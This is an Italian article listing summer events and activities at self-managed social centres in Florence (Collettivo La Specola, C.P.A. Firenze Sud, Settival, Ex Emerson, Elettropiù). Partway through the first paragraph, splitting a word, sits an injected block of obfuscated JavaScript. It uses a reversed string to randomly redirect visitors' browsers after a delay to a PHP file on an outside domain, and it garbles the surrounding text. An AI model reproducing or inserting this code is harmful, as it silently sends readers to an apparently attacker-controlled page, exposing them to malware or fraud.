Tutto il resto è autogestione

image_pdfimage_print

Ecco una carrellata veloce sulle iniziative “anomale” della prossima estate e sui programmi degli spazi autogestiti in città.
Firenze per
4 giugno: un evento molto importante anche se limitato ad un solo giorno. Ricordate le feste organizzate dal Collettivo La Specola per raccogliere fondi da destinare a progetti di solidarietà? Bè, quest’anno, i ragazzi hanno fatto le cose in gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande, si sono messi in rete con altre realtà e, con l’appoggio delle istituzioni cittadine, propongono una Giornata della Solidarietà Consapevole.
La Giornata prevede l’allestimento di 5 piazze tematiche nel centro storico – Piazza Signoria, i diritti; Piazza Santa Croce, l’ambiente e lo sviluppo sostenibile; Piazza Santa Maria Novella, i popoli; Piazza Santo Spirito, la pace; Piazza Santissima Annunziata, l’infanzia – dove troveranno spazio le associazioni cittadine e si svolgeranno spettacoli e manifestazioni in tema. Sono previsti inoltre due seminari a Palazzo Vecchio sull’Africa e sul commercio internazionale, mentre presso il cinema SpazioUno avrà luogo una maratona pomeridiana di documentari e cortometraggi in collaborazione con il Festival dei Popoli. Infine, la sera dalle 21 in poi grande festa conclusiva con allestimenti, musica dal vivo e concerto dei Train de Vie, al Parco dell’Istituto d’Arte di Porta Romana.
Scelta di fondo molto significativa, quella del “capitolato etico”: qualunque tipo di servizio o prodotto presente nella giornata dovrà passare un accurato esame: non ci saranno cioé prodotti collegabili ad un mancato rispetto dei diritti umani e del lavoro o a episodi di distruzione dell’ambiente e saranno privilegiati i prodotti equi e solidali.
Il Collettivo Specola cerca volontari che diano una mano per l’organizzazione e gestione di tutto quanto: per segnalare la propria disponibilità si può scrivere all’indirizzo globulirossi@inventati.org. Per raccogliere fondi per la Giornata si terrà inoltre una festa all’Elettropiù il 27 maggio.
www.globulirossi.it
C.P.A.
Il Centro Popolare Autogestito Firenze Sud non andrà in ferie: per tutta l’estate, da giugno a settembre, tutte le sere cene popolari, bar e musica all’aperto. Proseguiranno inoltre le altre attività: dalla palestra, aperta dal lunedì al venerdì dalle 19.30 alle 21.00 con corsi gratuiti di kick boxing e spazio per i giocolieri, alla libreria (la consultazione è possibile ogni giorno, dalle 18 alle 21), passando per la ciclofficina (recentemente inaugurata), il laboratorio autogestito per la tessitura a mano, il laboratorio di fotografia (aperto il giovedì dalle 19.00 alle 23.00) e il cinema all’aperto. Ci saranno, inoltre, due concerti “importanti” anche se le date sono ancora da stabilire. Quasi certa è, invece, la data dell’11 giugno per la festa-dibattito con cena e musica all’aperto contro la privatizzazione dell’acqua. Per chi fosse interessato, ogni martedì sera il C.P.A. ospita l’assemblea.
www.cpafisud.org – via Villamagna 27
Settival
Se quando guardate la televisione, accendete la radio, sfogliate un giornale o mangiate una merendina vi sembra che ci sia qualcosa che non va… se in tutto questo sentite il sapore della plastica e vi rimane qualche curiosità in più.. provate ad andare alla Casa del Popolo di Settignano nel weekend 20-21-22 maggio. Cosa c’è? Un festival delle autoproduzioni. Autoproduzioni, di che?
Di giornali di strada, di video, di documentari che non vedrete mai in televisione, musica, fumetti, informazione web, streaming radio, teatro, poesia, fotografia. E poi cappelli in brandamaglia, lisciva fatta in casa, torte e manicaretti self made. Workshop di raccolta erbette commestibili, e molto di più.
Il festival, pardon, il Settival, è nato da un’idea del Centro di documentazione Carlo Giuliani che ha la sua sede proprio alla Casa del Popolo di Settignano. Il Centro Giuliani è attivo dallo scorso anno ed è uno spazio a disposizione di tutte le realtà del movimento fiorentine che lottano per la pace e per una società più giusta. è un luogo di raccolta, catalogazione e fruizione di documenti e informazioni prodotte da questi canali “non ufficiali” ed è con questo spirito che è nata l’idea del Settival. Un festival che serva ad ampliare questo archivio ed iniziare a mostrare i primi frutti di questa raccolta.
C’è tutto un universo ricco e vitale che produce informazione, cultura e lotta politica. Il centro Carlo Giuliani lo vuol raccogliere e con il Settival lo vuol far vedere.
Ma non solo. Durante i tre giorni ampio spazio sarà dedicato ai dibattiti ed al confronto tra le varie realtà e persone che partecipano al Settival. Tema principale di discussione e confronto sarà “Liberare la fabbrica delle idee. Come battere i limiti alla produzione e distribuzione della cultura e dell’informazione”. Particolare attenzione sarà dedicata al tema delle Creative Commons, “copyright flessibile” – www.creativecommons.it – al diritto di autore ed a chi in Italia dovrebbe tutelarlo, cioé la Siae.
C.S.A.
Il Centro Sociale Autogestito Ex Emerson proseguirà fino circa a metà giugno con i suoi aperitivi e dj set, poi il caldo e la mancanza di uno spazio all’aperto produrranno il consueto stop alla programmazione di eventi. Andrà avanti però l’attività della palestra.
Per il 4 giugno segnaliamo il concerto dei Colle der Fomento, storico gruppo hip hop da Roma.
www.csaexemerson.it – via N. da Tolentino
Elettropiù
Lo spazio pubblico autogestito Elettropiù resterà aperto tutta l’estate con varie attività ed eventi.
Il 20 maggio è in programma la mostra “TriangolAzione: tre derive urbane” a cura di Cartografia Resistente, Laboratorio di Esplorazioni Urbane. Si tratta di un “racconto psico-geografico” composto da fotografie, installazioni sonore, video, elaborazioni testuali, che attraversa la periferia nord di Firenze toccando tre luoghi chiave: l’ex area Fiat a Novoli, l’Ikea ed il carcere di Sollicciano.
Nello stesso weekend spazio al teatro con lo spettacolo “Piccoli omicidi di stato” e poi con il seminario di clown dedicato alla biomeccanica.
Fra gli eventi di giugno segnaliamo per il 10 il concerto di Zulù (ex 99 Posse) in sostegno dei denunciati per alcune occupazioni, l’11 la mostra “Errata Corpora”, sul corpo e l’autolesionismo. Il 18 giugno dalle 16 alle 20 avrà luogo uno stage di contact improvisation e jam, con musica dal vivo.
Le attività quotidiane, dall’arrampicata al ping-pong, dalla palestra ai numerosi corsi (ceramica, sartoria, fotografia…), sono soggette a variazioni dovute alla disponibilità dei volontari che se ne occupano, per cui è meglio telefonare allo 055/7324220 dalle 16.30 alle 20. Comunque fino almeno a metà luglio molte cose dovrebbero essere in corso.
www.elettropiu.org – via Siena, cancelli blu

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *